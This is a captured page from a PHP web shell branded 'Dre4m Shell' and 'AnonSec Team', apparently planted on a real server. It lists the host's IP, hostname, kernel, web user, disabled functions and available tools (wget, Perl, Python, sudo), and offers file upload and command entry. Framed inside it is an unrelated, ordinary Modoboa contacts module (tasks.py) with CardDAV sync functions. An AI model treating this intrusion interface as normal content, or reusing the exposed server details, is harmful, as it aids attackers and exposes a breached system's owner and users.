Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.223.159.143
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/3/task/3/cwd/srv/modoboa/env/lib64/python3.5/site-packages/modoboa_contacts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/3/task/3/cwd/srv/modoboa/env/lib64/python3.5/site-packages/modoboa_contacts/tasks.py
"""Async tasks."""

from django.utils import timezone

from modoboa.lib import cryptutils

from .lib import carddav
from . import models


def get_cdav_client(request, addressbook, write_support=False):
    """Build a CardDAV client bound to the given address book.

    The client targets ``addressbook.url`` and authenticates with the
    user name of ``request.user`` and the decrypted ``password`` entry
    stored in the request session.

    :param request: current request (provides ``user`` and ``session``)
    :param addressbook: object exposing the collection ``url``
    :param write_support: forwarded as-is to the client constructor
    :return: a ``carddav.PyCardDAV`` instance
    """
    collection_url = addressbook.url
    login = request.user.username
    secret = cryptutils.decrypt(request.session["password"])
    return carddav.PyCardDAV(
        collection_url,
        user=login,
        passwd=secret,
        write_support=write_support
    )


def create_cdav_addressbook(addressbook, password):
    """Create the CardDAV collection for *addressbook*.

    Unlike the request-based helpers of this module, the password is
    received directly (already usable as-is) and the user name is taken
    from ``addressbook.user``.

    :param addressbook: object exposing ``url`` and ``user.username``
    :param password: password handed to the CardDAV client
    """
    collection_url = addressbook.url
    owner_name = addressbook.user.username
    client = carddav.PyCardDAV(
        collection_url,
        user=owner_name,
        passwd=password,
        write_support=True
    )
    client.create_abook()


def push_addressbook_to_carddav(request, addressbook):
    """Upload all contacts of an address book to its CardDAV collection.

    Every contact of ``addressbook.contact_set`` is uploaded as a new
    card and the etag returned for it is saved on the contact. Once all
    contacts are pushed, the address book records the current time as
    ``last_sync`` and the sync token reported by the client.

    Intended to be used only once per address book.
    """
    client = get_cdav_client(request, addressbook, True)
    for entry in addressbook.contact_set.all():
        # upload_new_card returns a pair; only the etag is kept.
        _, new_etag = client.upload_new_card(entry.uid, entry.to_vcard())
        entry.etag = new_etag
        entry.save(update_fields=["etag"])

    addressbook.last_sync = timezone.now()
    addressbook.sync_token = client.get_sync_token()
    addressbook.save(update_fields=["last_sync", "sync_token"])


def sync_addressbook_from_cdav(request, addressbook):
    """Fetch changes from CardDAV server and apply them locally.

    The server is asked for the changes made since
    ``addressbook.sync_token``. For each reported card:

    * a status containing ``"200"`` creates the contact if it is unknown
      and updates it from the vCard when the etag differs from the
      stored one;
    * a status containing ``"404"`` deletes the matching contact(s).

    When at least one card was reported, ``last_sync`` and
    ``sync_token`` are saved on the address book. When no card was
    reported, the function returns without touching the address book.

    :param request: current request, used to build the CardDAV client
    :param addressbook: address book to synchronize
    """
    clt = get_cdav_client(request, addressbook)
    changes = clt.sync_vcards(addressbook.sync_token)
    cards = changes["cards"]
    if not cards:
        return
    for card in cards:
        # The UID sometimes embeds the .vcf extension, sometimes not, so
        # both forms are used for lookups.
        long_uid = card["href"].split("/")[-1]
        short_uid = long_uid.split(".")[0]
        uids = [long_uid, short_uid]
        status = card["status"]
        if "200" in status:
            # NOTE(review): this lookup is not restricted to
            # ``addressbook`` -- confirm UIDs are unique across address
            # books before relying on it.
            contact = models.Contact.objects.filter(uid__in=uids).first()
            if not contact:
                contact = models.Contact(addressbook=addressbook)
            if contact.etag == card["etag"]:
                # Already up to date: skip the vCard download entirely.
                continue
            # Download the card only now that we know it has changed.
            content = clt.get_vcard(card["href"]).decode()
            contact.etag = card["etag"]
            contact.update_from_vcard(content)
        elif "404" in status:
            models.Contact.objects.filter(uid__in=uids).delete()
    addressbook.last_sync = timezone.now()
    addressbook.sync_token = changes["token"]
    addressbook.save(update_fields=["last_sync", "sync_token"])


def push_contact_to_cdav(request, contact):
    """Upload a single new contact to its CardDAV collection.

    The card is uploaded to the collection of ``contact.addressbook``
    and the etag returned by the upload is saved on the contact.
    """
    client = get_cdav_client(request, contact.addressbook, True)
    # upload_new_card returns a pair; only the etag is kept.
    _, new_etag = client.upload_new_card(contact.uid, contact.to_vcard())
    contact.etag = new_etag
    contact.save(update_fields=["etag"])


def update_contact_cdav(request, contact):
    """Push the current state of an existing contact to CardDAV.

    The card is addressed by the contact UID, with a ``.vcf`` suffix
    appended when the UID does not already end with it. The etag of the
    first card in the response is then saved on the contact.
    """
    client = get_cdav_client(request, contact.addressbook, True)
    card_name = contact.uid
    card_name = card_name if card_name.endswith(".vcf") else card_name + ".vcf"
    response = client.update_vcard(
        contact.to_vcard(), card_name, contact.etag)
    updated_card = response["cards"][0]
    contact.etag = updated_card["etag"]
    contact.save(update_fields=["etag"])


def delete_contact_cdav(request, contact):
    """Remove a contact's card from its CardDAV collection.

    The card is addressed by the contact UID, with a ``.vcf`` suffix
    appended when the UID does not already end with it. The stored etag
    is passed along with the delete request.
    """
    client = get_cdav_client(request, contact.addressbook, True)
    card_name = contact.uid
    card_name = card_name if card_name.endswith(".vcf") else card_name + ".vcf"
    client.delete_vcard(card_name, contact.etag)

Anon7 - 2022
AnonSec Team